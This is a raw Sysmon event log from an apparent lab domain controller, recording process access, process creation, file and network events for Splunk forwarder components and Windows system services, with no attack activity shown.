12:02:59.666{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F3-6064-0201-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:59.666{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:59.666{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F3-6064-0201-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.130{266CAFBE-64F3-6064-0201-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.833{266CAFBE-64F5-6064-0301-00000000AE01}6500NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\local\streamfwdlog.tmpMD5=51F5401F1865F9A40E1A961C7C0C9E0C,SHA256=CEAE70BB5A023E9C78590CFCBDDDC8D9FDBE4C74E061E5C4F439182BC2F01E53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.833{266CAFBE-64F5-6064-0301-00000000AE01}6500NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\local\streamfwdlog.confMD5=51F5401F1865F9A40E1A961C7C0C9E0C,SHA256=CEAE70BB5A023E9C78590CFCBDDDC8D9FDBE4C74E061E5C4F439182BC2F01E53,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:01.817{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:01.817{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.817{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.818{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.659{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.628{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.628{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.628{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.488{266CAFBE-64F6-6064-0601-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000008537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:01.419{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53599-false10.0.1.12-9997- 354300x80000000000000008536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:00.550{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53598-false23.37.43.27a23-37-43-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000008535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:00.545{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58533- 10341000x80000000000000008534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.519{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+518